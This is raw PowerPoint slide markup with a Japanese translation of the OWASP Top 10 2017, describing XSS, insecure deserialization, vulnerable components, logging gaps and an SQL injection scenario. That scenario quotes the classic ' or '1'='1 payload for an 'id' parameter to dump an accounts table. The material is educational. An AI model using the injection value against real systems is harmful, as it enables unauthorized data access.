                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</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の脆弱性は、適切なバリデーションやエスケープ処理を行っていない場合や、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</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や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</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を生成できるブラウザ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</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を用いているユーザ入力データで既存の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ページを更新する場合に発生します。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</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により攻撃者は、被害者のブラウザでスクリプトを実行してユーザーセッションを乗っ取ったり、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>サイトを改ざんしたり、悪意のあるサイトにユーザーをリダイレクトします。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2" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="630398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A7:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クロスサイトスクリプティング</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="7200932"/>
            <a:ext cx="5218177" cy="593947"/>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安全でないデシリアライゼーションは、リモートからのコード実行を誘発します。デシリアライゼーションの欠陥によるリモートからのコード実行に至らない場合でさえ、リプレイ攻撃やインジェクション攻撃、権限昇格といった攻撃にこの脆弱性を用います。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="12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4" name="Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="7173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A8:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安全でないデシリアライゼーション</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5" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8043775"/>
            <a:ext cx="5218177" cy="666504"/>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ライブラリ、フレームワークやその他ソフトウェアモジュールといったコンポーネントは、アプリケーションと同等の権限で動いています。脆弱性のあるコンポーネントが悪用されると、深刻な情報損失やサーバの乗っ取りにつながります。既知の脆弱性があるコンポーネントを利用しているアプリケーションや</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>は、アプリケーションの防御を損ない、様々な攻撃や悪影響を受けることになります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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6" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="8038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A9:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>既知の脆弱性のあるコンポーネントの使用</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7" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8910628"/>
            <a:ext cx="5218177" cy="6714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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>不十分なロギングとモニタリングは、インシデントレスポンスに組み込まれていないか、非効率なインテグレーションになっていると、攻撃者がシステムをさらに攻撃したり、攻撃を継続できるようにし、ほかのシステムにも攻撃範囲を拡げ、データを改竄、破棄、破壊することを可能にします。ほとんどのデータ侵害事件の調査によると、侵害を検知するのに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>日以上も要しており、また内部機関のプロセスやモニタリングからではなく、外部機関によって検知されています。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="12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8" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="8910628"/>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100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A10:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>不十分なロギングとモニタリング</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 name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA334A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66368" y="5550646"/>
            <a:ext cx="1443106" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>不適切なセキュリティ設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="11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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>あるアプリケーションは信頼できないデータを用いることで以下のような</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>脆弱な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>呼び出しを作ってしまいます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>同様に、アプリケーションがフレームワークを盲信すると、脆弱性のあるクエリになりえます </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>例えば、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クエリ言語</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQL)):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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>これら両方のケースにおいて、攻撃者はブラウザでパラメータ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>の値を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"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C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>に変更します。例えば</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>これで、両方のクエリの意味が変えられ、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>テーブルにあるレコードが全て返されることになります。さらなる攻撃により、データの改ざんや削除、ストアドプロシージャの呼び出しが可能です。</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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>次のような状況では、アプリケーションはこの攻撃に対して脆弱です</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ユーザが提供したデータが、アプリケーションによって検証、フィルタリング、またはサニタイズされない。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
